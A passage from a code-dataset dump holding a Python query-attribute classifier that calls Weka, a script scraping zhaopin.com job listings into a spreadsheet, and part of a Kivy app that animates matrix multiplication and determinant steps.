self.npRelation[q_index] = 1\n elif self.singularPluralX[q_index] == 2: \n # all plural \n self.npRelation[q_index] = 3\n elif self.singularPluralX[q_index] == 3:\n # singular mixed with plural\n self.npRelation[q_index] = 2\n\n \n def __timeInterval(self):\n '''\n use attr no 41 time_type: 0-none, 1-interval, 2-period\n '''\n for q_index in range( len(self.axesDecision.rangeList) ):\n lo, hi = self.axesDecision.rangeList[q_index]\n for en_index in range(lo, hi+1):\n self.time[q_index] = self.qe.attrList[en_index][46] \n\n @deprecated\n def __wiki_similarity(self):\n '''\n 0: doesn't contain equal entities\n 1: contain 1 pair of equal entities\n 2: contain more than 1 pair of equal entities\n '''\n wiki = entity_sim('../../../Wikimantic_Result.txt')\n wikiclass = []\n \n wikiclassfile = open('../../../j48_wiki.txt', 'r', 1)\n\n for line in wikiclassfile.readlines():\n act = re.search(re.compile('Actual:'), line).end()\n pred = re.search(re.compile('Predicted:'), line).end()\n wikiclass.append( int(line[pred:pred+2]) )\n# print len(wikiclass), len(wiki.wiki_range)\n# print wikiclass, '\\n', wiki.wiki_range\n\n cumulative,use = 0,0\n for qno in range(len(wiki.wiki_range)):\n w_count,w_count2 = 0, 0\n# sys.stdout.write( '\\n%d----\\n' % qno)\n wiki_count = wiki.wiki_range[qno]\n if wiki_count == 0:\n cumulative = cumulative + 1\n# sys.stdout.write('%d\\n' % (cumulative))\n else:\n cumulative = cumulative + 1\n for w_index in range( wiki_count ):\n# sys.stdout.write('%d\\n' % (cumulative+w_index))\n if wikiclass[cumulative+w_index-1] == 2:\n w_count = w_count + 1 \n use = use + 1\n if wikiclass[cumulative+w_index-1] == 1:\n w_count2 = w_count2+1\n use = use + 1\n cumulative = cumulative + wiki_count-1\n \n if w_count == 1: self.wiki_sim[qno] = 1 # rel_diff\n elif w_count >= 2 : self.wiki_sim[qno] = 2 # rank_all\n elif w_count2 == 1: self.wiki_sim[qno] = 3 # rank_1\n elif w_count2 >1 : self.wiki_sim[qno] = 2 # rank_all\n# print use\n \n \n def __runAll(self):\n self.__numOfXEntities()\n self.__numOfYEntities()\n self.__pluralX()\n self.__superlative()\n self.__trendCompareWords()\n self.__npPattern()\n self.__timeInterval()\n self.__modifiedX()\n\n\n def print_attr(self):\n for qno in range( len( self.axesDecision.resultList ) ):\n lo, hi = self.axesDecision.rangeList[qno]\n for attr in [self.numOfX[qno], self.numOfY[qno], self.singularPluralX[qno], \\\n self.superlatives[qno], self.specialWords[qno], self.npRelation[qno], self.time[qno], self.modified[qno] ]:\n sys.stdout.write('%d,' % attr)\n \n for attr in [self.qe.attrList[lo][1], self.qe.attrList[lo][4], self.qe.attrList[lo][5], \\\n self.qe.attrList[lo][6]]:\n sys.stdout.write('%d,' % attr)\n sys.stdout.write('%d,' % self.qe.attrList[lo][7])\n sys.stdout.write('%s\\n' % self.annotation.IMannotation[qno])\n\n def classifyIM(self, location):\n IM_attr_matrix = []\n for qno in range( len( self.axesDecision.resultList ) ):\n lo, hi = self.axesDecision.rangeList[qno]\n IM_attr_matrix.append( [self.numOfX[qno], self.numOfY[qno], self.singularPluralX[qno], \\\n self.superlatives[qno], self.specialWords[qno], self.npRelation[qno], self.time[qno], self.modified[qno] ] + \\\n [self.qe.attrList[lo][1], self.qe.attrList[lo][4], self.qe.attrList[lo][5], self.qe.attrList[lo][6], self.qe.attrList[lo][7] ] )\n from ARFFheader import Add_ARFFheader\n Add_ARFFheader( \"IM\", IM_attr_matrix , location)\n IM_weka_result = subprocess.check_output(\"java -cp ./src/Query/EntityExtractionSystem_03_2015/src/weka-3-6-6/weka.jar weka.classifiers.trees.J48 -l ./src/Query/EntityExtractionSystem_03_2015/src/weka-3-6-6/IMtree.j48.model -T \" + location + \" -p 0\" , shell=True)\n for result in IM_weka_result.split(\"\\n\"):\n match = re.search(\"[1-8]:[GMRT]\", result)\n if match: \n return {1:\"Get-Rank\",\n 2:\"Maximum-Minimum-Multiple\",\n 3:\"Maximum-Minimum-Single\",\n 4:\"General-Multiple\", \n 5:\"General-Single\", \n 6:\"Relative-Difference\", \n 7:\"Rank-All\", \n 8:\"Trend\"}[int( result[match.start()]) ]\n \n\n \n \nclass entity_sim():\n \n def __init__(self, wiki_result_path):\n self.init(wiki_result_path)\n \n def init(self, wiki_result_path):\n self.wiki_result, self.wiki_range = [], []\n prev_qno, wiki_count = -1, 0\n \n wiki_file = open(wiki_result_path, 'r', 1)\n for line in wiki_file.readlines():\n if len(line.split(',')) == 1:\n if prev_qno != -1:\n# self.wiki_result.append(wiki_pair)\n self.wiki_range.append(wiki_count) \n \n prev_qno = int(line)-1\n# if len(wiki_pair) == 0:\n# sys.stdout.write('0.0,0.0\\n')\n# wiki_pair = []\n wiki_count = 0\n \n else: \n# wiki_pair.append( [ float( line.split(',')[2] ), float( line.split(',')[3] ) ] )\n# sys.stdout.write('%s,' % ( line.split(',')[2] ) )\n# sys.stdout.write('%s' % ( line.split(',')[3] ) )\n wiki_count = wiki_count + 1\n self.wiki_range.append(wiki_count)\n \nclass Annotations():\n \n def __init__(self, annotationPath):\n Machine_Reliant_IM_Path = '../../Entity/Machine_Reliant_IM_Result.txt'\n self.init(annotationPath, Machine_Reliant_IM_Path)\n\n# self.igAttr = IgAttributes(XYDecisionPath, QueryEntityPath, EntityAttrPath)\n \n def init(self, annotationPath, IMresultPath):\n if os.path.isfile(annotationPath):\n annotationFile = open(annotationPath, 'r', 1)\n IMresultFile = open(IMresultPath, 'r', 1)\n self.annotatedAttrs, self.IMresults, self.IMannotation = [], [], []\n \n for line in annotationFile.readlines():\n attr, IM = [int(i) for i in line.split(',')[:-1]], line.split(',')[-1]\n # trend_count = 0\n # if IM.replace('\\n', '') == 'Trend' and random.random() > 0.8 and trend_count >=30:\n # break\n # else:\n # trend_count = trend_count +1 \n self.annotatedAttrs.append(attr)\n self.IMannotation.append(IM.replace('\\n', '').replace(\"-\", \"\"))\n elif len(annotationPath) == 0:\n self.IMannotation = [\"?\"]\n# for line in IMresultFile.readlines():\n# self.IMresults.append(line.replace('\\n', ''))\n \n def create_test(self):\n for i in range( len(self.annotatedAttrs) ):\n for a in self.annotatedAttrs[i]:\n sys.stdout.write('%d,' % a)\n sys.stdout.write('%s\\n' % self.IMannotation[i])\n \n def compareDiff(self):\n diffCount = 0\n for qno in range( len(self.annotatedAttrs) ):\n diff, classDiff = 0, 0\n generated = [self.igAttr.numOfX[qno], self.igAttr.numOfY[qno], self.igAttr.singularPluralX[qno], \\\n self.igAttr.superlatives[qno], self.igAttr.specialWords[qno], self.igAttr.npRelation[qno], \\\n self.igAttr.time[qno], self.igAttr.modified[qno] ]\n for attr in range( len(self.annotatedAttrs[qno]) ):\n if self.annotatedAttrs[qno][attr] != generated[attr]:\n diff = 1\n break\n if self.IMannotation[qno] != self.IMresults[qno]:\n classDiff = 1\n if classDiff == 1 or classDiff == 0:\n diffCount = diffCount + 1\n sys.stdout.write('Query %d.\\n' % (qno+1))\n sys.stdout.write('Query-Entity Pair %d - ' % self.igAttr.axesDecision.rangeList[qno][0] )\n sys.stdout.write('%d ' % self.igAttr.axesDecision.rangeList[qno][1] )\n sys.stdout.write('in total %d queries.\\n' % len(self.igAttr.axesDecision.rangeList))\n lo, hi = self.igAttr.axesDecision.rangeList[qno]\n for entity_index in range(lo, (hi+1)):\n sys.stdout.write('%s ' % self.igAttr.axesDecision.resultList[qno][(entity_index-lo)])\n sys.stdout.write('%s' % self.igAttr.qe.qePairs[entity_index])\n \n sys.stdout.write('annotated: ')\n for attr in self.annotatedAttrs[qno]:\n sys.stdout.write('%d ' % attr)\n \n sys.stdout.write('\\ngenerated: ')\n for gattr in generated:\n sys.stdout.write('%d ' % gattr)\n \n sys.stdout.write('\\nIntended Message: %s' % self.IMannotation[qno] )\n sys.stdout.write('\\nClassified as: %s' % self.IMresults[qno])\n \n sys.stdout.write('\\n\\n')\n sys.stdout.write('--- In total, %d queries have different Intended Messages.' % diffCount) \n \n\n\n \nif __name__ == '__main__':\n \n '''\n Use the following set of parameters if creating IM attributes for the 324 queries in Matt's experiment\n '''\n XYDecisionPath = 'New_Axis_Classification_Results.txt'\n QueryEntityPath = '../../Entity/New_XYEntities.txt' \n AnnotationPath = '../../Entity/AnnotatedIgAttr.txt'\n training_query_number = 324 \n EntityAttrPath = '../../Entity/New_XYAttributes.arff'\n \n '''\n Use the following set of parameters if testing IM attribute generation for a particular query\n '''\n XYDecision = \"X;X;X\"\n QueryEntity = \"America;China;GDP\"\n Annotation = \"\"\n query_number = 1\n \n igAttr = IgAttributes(XYDecisionPath, QueryEntityPath, EntityAttrPath, AnnotationPath, training_query_number)\n igAttr.print_attr() \n\n\n# from nltk.corpus import wordnet as wn\n# china = wn.synsets('Ford') \n## china = wn.synset('china.n.01') \n# for l in china: print l\n# support = wn.synset('united.n.01')\n# support2 = wn.synset('states.n.01')\n# for c in china:\n# print c\n# print 'china-year', wn.path_similarity(c,support) #no output\n# print 'china-russia', wn.path_similarity(c,support2) #get an output 0.08333 \n\n ","sub_path":"out/production/FacetingEval/Query/EntityExtractionSystem_03_2015/src/IgAttributes.py","file_name":"IgAttributes.py","file_ext":"py","file_size_in_byte":18669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"294041901","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/6 13:08\n# @Author : Winspain\n# @File : findJob.py\n# @Software: PyCharm\nimport requests\nimport re\nimport xlwt\n\ndef get_JobUrl():\n urls = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E6%9D%AD%E5%B7%9E&kw=crc&sm=0&p=1'\n #urls = 'http://sou.zhaopin.com/jobs/searchresult.ashx?jl=%E6%9D%AD%E5%B7%9E&kw=%E6%B5%8B%E8%AF%95&p=1&isadv=0'\n # jobDetalUrls = 'http://jobs.zhaopin.com/263940938257473.htm?ssidkey=y&ss=201&ff=03&sg=96fe6a13f5144b4187610cb4fd28450f&so=3'\n #jl:杭州 kw:crc sm:0 p:1\n response = requests.get(urls).text\n data = re.findall(r'par=(.*)',response)\n for lines in data:\n getHref = re.findall(r'href=\\\"(.*)\" target=\"_blank\">',str(lines))\n geTail = str(re.findall(r'\\\"(.*)\\\" href',lines)).replace(';','').replace('amp','')\n wholeUrl = (str(getHref) + '?' + str(geTail)).replace('\\'][\\'','').replace('\\']','').replace('[\\'','')\n with open('jobUrl.txt','a') as f:\n f.writelines(wholeUrl + '\\n')\n\ndef jobDetal():\n with open('jobUrl.txt','r') as f:\n wb = xlwt.Workbook()\n sh = wb.add_sheet('智联招聘',cell_overwrite_ok=True)\n count = 1\n for lines in f.readlines():\n response = requests.get(lines.strip()).text\n salary = re.findall(r'月薪:(.*)/月', response)\n jobNums = re.findall(r'招聘人数:(.*)人', response)\n workAddress = re.findall(r'

(.*)

', response)\n workAddress = re.findall(r'[\\u4e00-\\u9fa5]+',str(workAddress))\n compName = re.findall(r'Str_CompName = \"(.*)\";', response)\n description = re.findall(r'SWSStringCutStart -->(.*)', size_hint_x = .1))\r\n\t\tself.m2 = Matriz_label_m(lista = mat2, size_hint_x = .45)\r\n\t\tself.add_widget(self.m2)\r\n\t\tself.h = len(self.m1.matriz) - 1\r\n\t\tself.v2 = len(self.m2.matriz[0]) - 1\r\n\t\tself.v1 = len(self.m2.matriz) - 1\r\n\t\tClock.schedule_interval(self.muda, 0.5)\r\n\t\r\n\tdef muda(self, *args):\r\n\t\tprint(self.m1.matriz)\r\n\t\tprint('separacao')\r\n\t\tprint(self.m2.matriz)\r\n\t\tself.m1.atualizar_h(self.m1.matriz[self.m][0])\r\n\t\tself.m2.atualizar_v(self.m2.matriz[self.v1][self.m], cor=(0,1,0,1))\r\n\t\tself.m += 1\r\n\t\tif self.m > self.h:\r\n\t\t\tself.m = 0\r\n\t\r\n\t\r\n\r\nclass Matriz_dupla(BoxLayout):\r\n\t\r\n\tdef __init__(self, mat1, mat2, sinal, **kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.add_widget(Matriz_label(lista = mat1, size_hint_x = .45))\r\n\t\tself.add_widget(Label(text=sinal, size_hint_x = .1))\r\n\t\tself.add_widget(Matriz_label(lista = mat2, size_hint_x = .45))\r\n\r\nclass Matriz_label(BoxLayout):\r\n\t\r\n\tdef __init__(self, lista, **kw):\r\n\t\tsuper(Matriz_label, self).__init__(**kw)\r\n\t\tself.spacing = 10\r\n\t\tlinhas = len(lista)\r\n\t\tcols = len(lista[0])\r\n\t\t\r\n\t\tif linhas <= 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\r\n\t\telif linhas <= 4 and cols > 4:\r\n\t\t\tcol1 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tcol2 = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcol3 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tcol1.add_widget(Label_branca(text=str(elemento[0])))\r\n\t\t\t\tcol2.add_widget(Label_branca(text=str(elemento[1])))\r\n\t\t\t\tcol3.add_widget(Label_branca(text=str(elemento[-1])))\r\n\t\t\tself.add_widget(col1)\r\n\t\t\tself.add_widget(col2)\r\n\t\t\tself.add_widget(Label(text=('. . .')))\r\n\t\t\tself.add_widget(col3)\r\n\r\n\t\telif linhas > 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista[0:2]:\r\n\t\t\t\tlinha = BoxLayout(spacing=10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\t\tself.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[-1]:\r\n\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\tlinha2.add_widget(label)\r\n\t\t\tself.add_widget(linha2)\r\n\r\n\t\telif linhas > 4 and cols > 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlinha1 = BoxLayout(spacing=10)\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tlinha4 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0][0:2]:\r\n\t\t\t\tlinha1.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha1.add_widget(Label(text='. . .'))\r\n\t\t\tlinha1.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[1][0:2]:\r\n\t\t\t\tlinha2.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha2.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[-1][0:2]:\r\n\t\t\t\tlinha4.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha4.add_widget(Label(text='. . .'))\r\n\t\t\tlinha4.add_widget(Label_branca(text=str(lista[-1][-1])))\r\n\t\t\tself.add_widget(linha1)\r\n\t\t\tself.add_widget(linha2)\r\n\t\t\tself.add_widget(Label(text='. . .'))\r\n\t\t\tself.add_widget(linha4)\r\n\r\nclass Det_3(BoxLayout):\r\n\t\r\n\tm = 0\r\n\tprodp = []\r\n\tprods = []\r\n\t\r\n\tdef __init__(self, mat1, local, **kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.local = local\r\n\t\tself.prodp = []\r\n\t\tself.prods = []\r\n\t\tm = 0\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, det=True, size_hint_x = .6)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tClock.schedule_interval(self.info, 0.5)\r\n\t\tClock.schedule_once(self.listra, 2)\r\n\t\t\r\n\tdef listra(self, *args):\r\n\t\tself.m1.determinante_3()\r\n\t\t\r\n\t\r\n\tdef info(self, *args):\r\n\t\tprod = float(self.m1.matriz[self.m][2].ids.texto.text) * float(self.m1.matriz[self.m+1][1].ids.texto.text) * float(self.m1.matriz[self.m+2][0].ids.texto.text)\r\n\t\tself.prods.append(prod)\r\n\t\tm1 = Mensagem(text = \"{} × {} × {} = {:.2f}\".format(self.m1.matriz[self.m][2].ids.texto.text, self.m1.matriz[self.m+1][1].ids.texto.text, self.m1.matriz[self.m+2][0].ids.texto.text, prod), font_name = 'math', halign = 'center', color = (1,0,0,1))\r\n\t\t\r\n\t\tprod2 = float(self.m1.matriz[self.m][0].ids.texto.text) * float(self.m1.matriz[self.m+1][1].ids.texto.text) * float(self.m1.matriz[self.m+2][2].ids.texto.text)\r\n\t\tself.prodp.append(prod2)\r\n\t\tm2 = Mensagem(text = \"{} × {} × {} = {:.2f}\".format(self.m1.matriz[self.m][0].ids.texto.text, self.m1.matriz[self.m+1][1].ids.texto.text, self.m1.matriz[self.m+2][2].ids.texto.text, prod2), font_name = 'math', halign = 'center', color = (0,1,0,1))\r\n\t\t\t\r\n\t\tself.m+= 1\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\tbox.add_widget(m1)\r\n\t\tbox.add_widget(m2)\r\n\t\t#self.local.ids.p.add_widget(m1)\r\n\t\t#self.local.ids.p.add_widget(m2)\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\t\r\n\t\tif self.m >= 3:\r\n\t\t\tClock.unschedule(self.info)\r\n\t\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\tdet = sum(self.prodp) - sum(self.prods)\r\n\t\t\tdet = Fraction(det).limit_denominator()\r\n\t\t\tmr = Mensagem(text = '({} + {} + {}) - ({} + {} + {}) = {}'.format(self.prodp[0], self.prodp[1], self.prodp[2], self.prods[0], self.prods[1], self.prods[2], det), font_name = 'math', halign='center', color=(0,0,0,1))\r\n\t\t\tbox.add_widget(mr)\r\n\t\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\t\r\n\t\r\n\t\t\r\nclass Det_2(BoxLayout):\r\n\t\r\n\tm = 0\r\n\tprod = []\r\n\t\r\n\tdef __init__(self, mat1, local,**kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.local = local\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, size_hint_x = .6)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Widget(size_hint_x= .2))\r\n\t\tClock.schedule_once(self.info, 0.5)\r\n\t\tClock.schedule_once(self.listra, 1.5)\r\n\t\t\r\n\t\r\n\tdef listra(self, *args):\r\n\t\tself.m1.determinante_2()\r\n\t\r\n\tdef info(self, *args):\r\n\t\tprod2 = float(self.m1.matriz[0][1].ids.texto.text) * float(self.m1.matriz[1][0].ids.texto.text)\r\n\t\tm2 = Mensagem(text = \"{} × {} = {:.2f}\".format(self.m1.matriz[0][1].ids.texto.text, self.m1.matriz[1][0].ids.texto.text, prod2), font_name = 'math', halign = 'center', color = (0,1,0,1))\r\n\t\t\r\n\t\tprod = float(self.m1.matriz[0][0].ids.texto.text) * float(self.m1.matriz[1][1].ids.texto.text)\r\n\t\tm1 = Mensagem(text = \"{} × {} = {:.2f}\".format(self.m1.matriz[0][0].ids.texto.text, self.m1.matriz[1][1].ids.texto.text, prod), font_name = 'math', halign = 'center', color = (1,0,0,1))\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\r\n\t\tbox.add_widget(m2)\r\n\t\tbox.add_widget(m1)\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\t\t\r\n\t\tbox = BoxLayout(spacing = 10, size_hint_y= None, height = '18dp')\r\n\t\t\r\n\t\tbox.add_widget(Mensagem(text = '{} - {} = {}'.format(prod, prod2, Fraction(prod - prod2).limit_denominator()), halign = 'center', font_name = 'math', color = (0,0,0,1)))\r\n\t\tself.local.ids.scroll.add_widget(box)\r\n\r\n\r\nclass Matriz_multi(BoxLayout):\r\n\t\r\n\tn = 0\r\n\tm = 0\r\n\t\r\n\tdef __init__(self, mat1, mat2, sinal,**kw):\r\n\t\tsuper().__init__(**kw)\r\n\t\tself.m1 = Matriz_label_m(lista = mat1, size_hint_x = .45)\r\n\t\tself.add_widget(self.m1)\r\n\t\tself.add_widget(Label(text=sinal, size_hint_x = .1))\r\n\t\tself.m2 = Matriz_label_m(lista = mat2, size_hint_x = .45)\r\n\t\tself.add_widget(self.m2)\r\n\t\tself.h = len(self.m1.matriz) - 1\r\n\t\tself.v2 = len(self.m2.matriz[0]) - 1\r\n\t\tself.v1 = len(self.m2.matriz) - 1\r\n\t\tClock.schedule_interval(self.muda, 0.5)\r\n\t\r\n\tdef muda(self, *args):\r\n\t\tprint(self.m1.matriz)\r\n\t\tprint('separacao')\r\n\t\tprint(self.m2.matriz)\r\n\t\tself.m1.atualizar_h(self.m1.matriz[self.m][0])\r\n\t\tself.m2.atualizar_v(self.m2.matriz[self.v1][self.n], cor=(1,0,0,1))\r\n\t\tself.n += 1\r\n\t\tif self.n > self.v2:\r\n\t\t\tself.n = 0\r\n\t\t\tself.m += 1\r\n\t\tif self.m > self.h:\r\n\t\t\tself.m = 0\r\n\r\nclass Matriz_label_m(BoxLayout):\r\n\t\r\n\tmatriz = []\r\n\t\r\n\t\r\n\t\r\n\tdef __init__(self, lista, det=False, **kw):\r\n\t\tsuper(Matriz_label_m, self).__init__(**kw)\r\n\t\tself.matriz = []\r\n\t\tself.spacing = 10\r\n\t\tlinhas = len(lista)\r\n\t\tcols = len(lista[0])\r\n\t\t\r\n\t\tif linhas <= 4 and cols <= 4 and det == False:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\t#li = []\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\t\t#li.append(label)\r\n\t\t\t\t\r\n\t\t\t\t#self.matriz.append(li)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\telif linhas <= 4 and cols <= 4 and det == True:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlis = []\r\n\t\t\tdados = []\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tlinha = BoxLayout(spacing= 10)\r\n\t\t\t\tli = []\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\t\tli.append(label)\r\n\t\t\t\tdados.append(li)\r\n\t\t\t\tlis.append(linha)\r\n\t\t\tprint(lis)\r\n\t\t\t#kk = kkk\r\n\t\t\t\r\n\t\t\tcima = BoxLayout(spacing=10)\r\n\t\t\tbaixo = BoxLayout(spacing=10)\r\n\t\t\tcima.add_widget(Label_branca(text= str(lista[2][0])))\r\n\t\t\tcima.add_widget(Label_branca(text = ''))\r\n\t\t\tcima.add_widget(Label_branca(text = str(lista[2][2])))\r\n\t\t\t\r\n\t\t\tbaixo.add_widget(Label_branca(text=str(lista[0][0])))\r\n\t\t\tbaixo.add_widget(Label_branca(text=''))\r\n\t\t\tbaixo.add_widget(Label_branca(text= str(lista[0][2])))\r\n\t\t\t\r\n\t\t\tlis.insert(0, cima)\r\n\t\t\tlis.append(baixo)\r\n\t\t\tprint(lis)\r\n\t\t\t\r\n\t\t\tfor i in lis:\r\n\t\t\t\tself.add_widget(i)\r\n\r\n\t\telif linhas <= 4 and cols > 4:\r\n\t\t\tcol1 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tcol2 = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcolp = BoxLayout(orientation='vertical',spacing=10)\r\n\t\t\tcol3 = BoxLayout(orientation='vertical', spacing=10)\r\n\t\t\tfor elemento in lista:\r\n\t\t\t\tcol1.add_widget(Label_branca(text=str(elemento[0])))\r\n\t\t\t\tcol2.add_widget(Label_branca(text=str(elemento[1])))\r\n\t\t\t\tcolp.add_widget(Label_branca(text='...'))\r\n\t\t\t\tcol3.add_widget(Label_branca(text=str(elemento[-1])))\r\n\t\t\tself.add_widget(col1)\r\n\t\t\tself.add_widget(col2)\r\n\t\t\t#self.add_widget(Label(text=('. . .')))\r\n\t\t\tself.add_widget(colp)\r\n\t\t\tself.add_widget(col3)\r\n\t\t\t\r\n\r\n\t\telif linhas > 4 and cols <= 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tfor elemento in lista[0:2]:\r\n\t\t\t\tlinha = BoxLayout(spacing=10)\r\n\t\t\t\tfor num in elemento:\r\n\t\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\t\tlinha.add_widget(label)\r\n\t\t\t\tself.add_widget(linha)\r\n\t\t\tlinhap = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0]:\r\n\t\t\t\tlinhap.add_widget(Label_branca(text='...'))\r\n\t\t\tself.add_widget(linhap)\r\n\t\t\t#self.add_widget(Label(text='. . .'))\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[-1]:\r\n\t\t\t\tlabel = Label_branca(text=str(num))\r\n\t\t\t\tlinha2.add_widget(label)\r\n\t\t\tself.add_widget(linha2)\r\n\r\n\t\telif linhas > 4 and cols > 4:\r\n\t\t\tself.orientation = 'vertical'\r\n\t\t\tlinha1 = BoxLayout(spacing=10)\r\n\t\t\tlinha2 = BoxLayout(spacing=10)\r\n\t\t\tlinhap = BoxLayout(spacing=10)\r\n\t\t\tlinha4 = BoxLayout(spacing=10)\r\n\t\t\tfor num in lista[0][0:2]:\r\n\t\t\t\tlinha1.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha1.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha1.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in lista[1][0:2]:\r\n\t\t\t\tlinha2.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha2.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha2.add_widget(Label_branca(text=str(lista[0][-1])))\r\n\t\t\tfor num in range(1,len(lista[0])):\r\n\t\t\t\tlinhap.add_widget(Label_branca(text='...'))\r\n\t\t\t\t\r\n\t\t\tfor num in lista[-1][0:2]:\r\n\t\t\t\tlinha4.add_widget(Label_branca(text=str(num)))\r\n\t\t\tlinha4.add_widget(Label_branca(text='. . .'))\r\n\t\t\tlinha4.add_widget(Label_branca(text=str(lista[-1][-1])))\r\n\t\t\tself.add_widget(linha1)\r\n\t\t\tself.add_widget(linha2)\r\n\t\t\tself.add_widget(linhap)\r\n\t\t\t#self.add_widget(Label(text='. . .'))\r\n\t\t\tself.add_widget(linha4)\r\n\t\t\r\n\t\t\r\n\t\tif linhas <= 4 and cols > 4:\r\n\t\t\tcol1 = col1.children[::-1]\r\n\t\t\tprint(len(col1))\r\n\t\t\t#kk = kkk\r\n\t\t\tcol2 = col2.children[::-1]\r\n\t\t\tcolp = colp.children[::-1]\r\n\t\t\tcol3 = col3.children[::-1]\r\n\t\t\tm = 0\r\n\t\t\tfor c in range(0, linhas):\r\n\t\t\t\tli = []\r\n\t\t\t\tli.append(col1[c])\r\n\t\t\t\tli.append(col2[c])\r\n\t\t\t\tli.append(colp[c])\r\n\t\t\t\tli.append(col3[c])\r\n\t\t\t\tself.matriz.append(li)\r\n\t\t\t\t\r\n\t\t\tprint(self.matriz)\r\n\t\t\t#kk = kkk\r\n\t\telse:\r\n\t\t\tfor c in self.children[::-1]:\r\n\t\t\t\t\tli = []\r\n\t\t\t\t\tfor child in c.children[::-1]:\r\n\t\t\t\t\t\tli.append(child)\r\n\t\t\t\t\tself.matriz.append(li)\r\n\t\t\t\r\n\t\tprint(self.matriz)\r\n\t\t#k = kkk\r\n\t\t\r\n\tdef atualizar_v(self, p, cor,*args):\r\n\t\t\r\n\t\t#kk = kkk\r\n\t\tx1 = p.x\r\n\t\ty1 = p.y\r\n\t\tw = p.width\r\n\t\th = 0\r\n\t\tfor c in range(0, len(self.matriz)):\r\n\t\t\th += self.matriz[c][0].height\r\n\t\th += 10*(len(self.matriz)-1)\r\n\t\t#h = self.matriz[0][0].height +self.matriz[1][0].height + self.matriz[2][0].height + self.matriz[3][0].height + 10*3\r\n\t\tself.canvas.before.clear()\r\n\t\twith self.canvas.before:\r\n\t\t\tColor(rgba= cor)\r\n\t\t\tLine(rectangle=(x1,y1,w,h), width = 5)\r\n\t\t\t\r\n\t\r\n\tdef atualizar_h(self, p, *args):\r\n\t\t\r\n\t\t#kk = kkk\r\n\t\tx1 = p.x\r\n\t\ty1 = p.y\r\n\t\th = p.height\r\n\t\tw = 0\r\n\t\tfor c in range(0, len(self.matriz[0])):\r\n\t\t\tw += self.matriz[0][c].width\r\n\t\tw += 10 * (len(self.matriz[0])-1)\r\n\t\r\n\t\t#w = self.matriz[0][0].width +self.matriz[0][1].width + self.matriz[0][2].width + self.matriz[0][3].width + 10*3\r\n\t\tself.canvas.before.clear()\r\n\t\twith self.canvas.before:\r\n\t\t\tColor(rgba= (1,0,0,1))\r\n\t\t\tLine(rectangle=(x1,y1,w,h), width = 5)\r\n\t\t\t\r\n\t\r\n\tdef determinante_2(self, 